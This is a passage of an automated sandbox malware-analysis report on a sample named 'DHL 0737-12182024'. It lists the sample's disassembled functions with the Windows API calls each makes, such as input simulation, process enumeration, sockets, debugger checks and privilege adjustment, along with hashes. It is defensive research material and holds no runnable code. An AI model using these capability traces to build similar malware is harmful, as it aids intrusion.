                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __floor_pentium4
                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                            • API String ID: 4168288129-2761157908
                                                                                            • Opcode ID: e22717d328db10d0f4692ec32d1d7c1285c0f166976a787dde6d91ec72f55d62
                                                                                            • Instruction ID: 07683d1b2ab182157a13acb91b8fcf57a6dbc14d9a9d8e0d5b4d4d77661ce0c9
                                                                                            • Opcode Fuzzy Hash: e22717d328db10d0f4692ec32d1d7c1285c0f166976a787dde6d91ec72f55d62
                                                                                            • Instruction Fuzzy Hash: 63C22A71E046288FDB29CE28DD407EAB7B5FB48306F1441EAD94DE7241E774AE898F41
                                                                                            Function 0089648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 008964DC
                                                                                            • CoInitialize.OLE32(00000000), ref: 00896639
                                                                                            • CoCreateInstance.OLE32(008BFCF8,00000000,00000001,008BFB68,?), ref: 00896650
                                                                                            • CoUninitialize.OLE32 ref: 008968D4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 886957087-24824748
                                                                                            • Opcode ID: 27494c0a6d88a54fc0e926a3ee0136d2fefe1bd7377695195624f7c302f62c0a
                                                                                            • Instruction ID: 5fffc080e39bcac0be9f7940355ae58669a849327959036659c9caf070624fe1
                                                                                            • Opcode Fuzzy Hash: 27494c0a6d88a54fc0e926a3ee0136d2fefe1bd7377695195624f7c302f62c0a
                                                                                            • Instruction Fuzzy Hash: 6AD13771508211AFC704EF28D891E6BB7E8FF98704F04496DF595CB2A1EB70E949CB92
                                                                                            Function 008A22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 008A22E8
                                                                                              • Part of subcall function 0089E4EC: GetWindowRect.USER32(?,?), ref: 0089E504
                                                                                            • GetDesktopWindow.USER32 ref: 008A2312
                                                                                            • GetWindowRect.USER32(00000000), ref: 008A2319
                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 008A2355
                                                                                            • GetCursorPos.USER32(?), ref: 008A2381
                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008A23DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                            • String ID:
                                                                                            • API String ID: 2387181109-0
                                                                                            • Opcode ID: 36ae15102eae923b0048803e3e22ebb274ca9771dd62882164241552f0bd87f1
                                                                                            • Instruction ID: 3b89aa2dffaf1c9d84801d748dc60f894296f14a3ea17f9987d5db12b80ccda7
                                                                                            • Opcode Fuzzy Hash: 36ae15102eae923b0048803e3e22ebb274ca9771dd62882164241552f0bd87f1
                                                                                            • Instruction Fuzzy Hash: 1B31AD72504315AFDB20DF58C849B9BBBA9FF86314F000A19F985D7291DB74EA09CB92
                                                                                            Function 00899B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00899B78
                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00899C8B
                                                                                              • Part of subcall function 00893874: GetInputState.USER32 ref: 008938CB
                                                                                              • Part of subcall function 00893874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00893966
                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00899BA8
                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00899C75
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1972594611-438819550
                                                                                            • Opcode ID: a226569e1eb2e1a540ef08f6bf09b6e730a936c7276910ded8708a896fca5058
                                                                                            • Instruction ID: 01e89d16fc96ccc3a1a0e0fec629e57d69e7a1f86609d8125efc38a2e36d65cc
                                                                                            • Opcode Fuzzy Hash: a226569e1eb2e1a540ef08f6bf09b6e730a936c7276910ded8708a896fca5058
                                                                                            • Instruction Fuzzy Hash: 8641607190021A9FCF14EF68DC55AEE7BB8FF05314F18415AE855E2291EB349E84CF61
                                                                                            Function 0083997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00839A4E
                                                                                            • GetSysColor.USER32(0000000F), ref: 00839B23
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00839B36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$LongProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3131106179-0
                                                                                            • Opcode ID: 8d028dcca6dd35cf59ca4ef152459a1a3d4f79626644a1b3007f0dc3cd17e66f
                                                                                            • Instruction ID: 66b233a1405723bb2efd3b05795d56a47f4bc76aff0d9b0c35d74902cb2f5706
                                                                                            • Opcode Fuzzy Hash: 8d028dcca6dd35cf59ca4ef152459a1a3d4f79626644a1b3007f0dc3cd17e66f
                                                                                            • Instruction Fuzzy Hash: 31A13C71208428EEE7289A3C8C59EBB3A5DFBC2354F154319F582C66D9CAA5DD01C3F2
                                                                                            Function 008A1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008A304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008A307A
                                                                                              • Part of subcall function 008A304E: _wcslen.LIBCMT ref: 008A309B
                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008A185D
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1884
                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 008A18DB
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A18E6
                                                                                            • closesocket.WSOCK32(00000000), ref: 008A1915
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1601658205-0
                                                                                            • Opcode ID: 52ed4d1618b9c6706455aff9c125ad89e3c77f3a77004d79dec36bf9debc0254
                                                                                            • Instruction ID: 59d59d0a5917431afbe9d3e35582b525dce9c396a0df89bf1ab74bb393573ad1
                                                                                            • Opcode Fuzzy Hash: 52ed4d1618b9c6706455aff9c125ad89e3c77f3a77004d79dec36bf9debc0254
                                                                                            • Instruction Fuzzy Hash: 4251B371A002109FEB10AF28D886F2A77E5FB45718F088058F9059F783DB75AD41CBE2
                                                                                            Function 008B1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                            • String ID:
                                                                                            • API String ID: 292994002-0
                                                                                            • Opcode ID: e71b006ea79415eea50eb18ae0353211934ef840bb7c642d12deee6b525826e3
                                                                                            • Instruction ID: 389eeb2a17288fc8729a0d8e30407d020c7e0ca2a9bd7149652f5f7a049edd64
                                                                                            • Opcode Fuzzy Hash: e71b006ea79415eea50eb18ae0353211934ef840bb7c642d12deee6b525826e3
                                                                                            • Instruction Fuzzy Hash: B621A3317402119FDB208F1AD868BAA7FA5FF95314F598058E84ACF352CB71ED42CB95
                                                                                            Function 00828060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                            • API String ID: 0-1546025612
                                                                                            • Opcode ID: dac799d16a452db6c1ad93260a5f74b5a9940dbcaa4bcd98f5f40ab0014ca7fa
                                                                                            • Instruction ID: 59399ca08b8fe6e6c6667f5aacf1527fd87585db6595aac4def7cbed65b43eb3
                                                                                            • Opcode Fuzzy Hash: dac799d16a452db6c1ad93260a5f74b5a9940dbcaa4bcd98f5f40ab0014ca7fa
                                                                                            • Instruction Fuzzy Hash: E4A27970A0166ACBDF24CF58D9447AEB7B1FB54314F2581AAE815EB384EB309DD1CB90
                                                                                            Function 008AA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 008AA6AC
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 008AA6BA
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 008AA79C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AA7AB
                                                                                              • Part of subcall function 0083CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00863303,?), ref: 0083CE8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1991900642-0
                                                                                            • Opcode ID: b0a1a2d10b70dfc568e555fc5e32aea4b7a6a2be9d06d10cb0587b5df5e2d0c0
                                                                                            • Instruction ID: d79fa7cd5c941dcbab52c318f560f6e73503adb2bd5cb322a844685075306060
                                                                                            • Opcode Fuzzy Hash: b0a1a2d10b70dfc568e555fc5e32aea4b7a6a2be9d06d10cb0587b5df5e2d0c0
                                                                                            • Instruction Fuzzy Hash: A0513871508310AFD714EF28D886A6BBBE8FF89754F00492DF585D7252EB30D944CB92
                                                                                            Function 0088AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0088AAAC
                                                                                            • SetKeyboardState.USER32(00000080), ref: 0088AAC8
                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0088AB36
                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0088AB88
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: b3eb334a661dd35a36aa6b3ade21eebcf029672205a1186a39691dccb62e7657
                                                                                            • Instruction ID: 12fecddced54e19681360557a64f9655334e7d7e0100029db4eb6922eaa33fd2
                                                                                            • Opcode Fuzzy Hash: b3eb334a661dd35a36aa6b3ade21eebcf029672205a1186a39691dccb62e7657
                                                                                            • Instruction Fuzzy Hash: 5D31F630A40258AEFB39AA688C05BFA7BA6FB45330F04421BF5C1D65D1D3759981C763
                                                                                            Function 0089CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0089CE89
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0089CEEA
                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0089CEFE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 234945975-0
                                                                                            • Opcode ID: f49e529b51d08918a2835a5d96b0391e628c2ba6aff43e1fdfd5ba5ab06392b7
                                                                                            • Instruction ID: 1debd0588b88b1beef469985b4b18744ff1d79f763458bad4c55897c275f4804
                                                                                            • Opcode Fuzzy Hash: f49e529b51d08918a2835a5d96b0391e628c2ba6aff43e1fdfd5ba5ab06392b7
                                                                                            • Instruction Fuzzy Hash: BE219DB15007099FDB30EF65C948BAA77F8FB50358F14442EE546D2151EB75EE048B64
                                                                                            Function 00888298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008882AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen
                                                                                            • String ID: ($|
                                                                                            • API String ID: 1659193697-1631851259
                                                                                            • Opcode ID: 98a49fb9da157b0f9db026a12087a71453b497dd0b7778892ee243b58918ced8
                                                                                            • Instruction ID: d9ae9b67d34a545e85f48ecf160b1b6d16706f156aba5fd644342cda9f9b7b7f
                                                                                            • Opcode Fuzzy Hash: 98a49fb9da157b0f9db026a12087a71453b497dd0b7778892ee243b58918ced8
                                                                                            • Instruction Fuzzy Hash: 0A323474A00605DFCB28DF59C480A6AB7F0FF48710B55C56EE59ADB3A1EB70E981CB40
                                                                                            Function 00895C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00895CC1
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00895D17
                                                                                            • FindClose.KERNEL32(?), ref: 00895D5F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 0b8204a5cb3f5e1d0f7bc3a825c7a083c1b8077c30fa8b0a7f41af022ad46177
                                                                                            • Instruction ID: 6148d0fe850fc41f018553aaf5b370beba424cd7bfe01682f8eaebfd4a0e6969
                                                                                            • Opcode Fuzzy Hash: 0b8204a5cb3f5e1d0f7bc3a825c7a083c1b8077c30fa8b0a7f41af022ad46177
                                                                                            • Instruction Fuzzy Hash: 14519A346046019FCB14DF28D498A9AB7E4FF49324F18856EE95ACB3A2DB30ED44CB91
                                                                                            Function 00852622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0085271A
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00852724
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00852731
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 2f891b6d98fd4b854316aed62e344c95414839cc034ea3ba3d76a16eb4db095a
                                                                                            • Instruction ID: a8fd0ae91a0b625dea2cf1987bf22241d627dc4b3432a5b0c1a6ed314e8828b6
                                                                                            • Opcode Fuzzy Hash: 2f891b6d98fd4b854316aed62e344c95414839cc034ea3ba3d76a16eb4db095a
                                                                                            • Instruction Fuzzy Hash: 9A31B67591122C9BCB21DF68DC89B99B7B8FF08310F5041DAE81CA6261EB309F858F45
                                                                                            Function 008951CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 008951DA
                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00895238
                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 008952A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                            • String ID:
                                                                                            • API String ID: 1682464887-0
                                                                                            • Opcode ID: 95eb73fb7f4e0dd4e95c46f67f9cffb128f03883d70c70355bd8fbde8cf30fdf
                                                                                            • Instruction ID: 8f1173be2077804032e46a88eb7f42c9081999b4e1c07984ba9131c205c12632
                                                                                            • Opcode Fuzzy Hash: 95eb73fb7f4e0dd4e95c46f67f9cffb128f03883d70c70355bd8fbde8cf30fdf
                                                                                            • Instruction Fuzzy Hash: 51313E75A00518DFDB00EF98D884EADBBB5FF49314F088099E805EB3A2DB31E855CB91
                                                                                            Function 008816C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0083FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00840668
                                                                                              • Part of subcall function 0083FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00840685
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0088170D
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0088173A
                                                                                            • GetLastError.KERNEL32 ref: 0088174A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
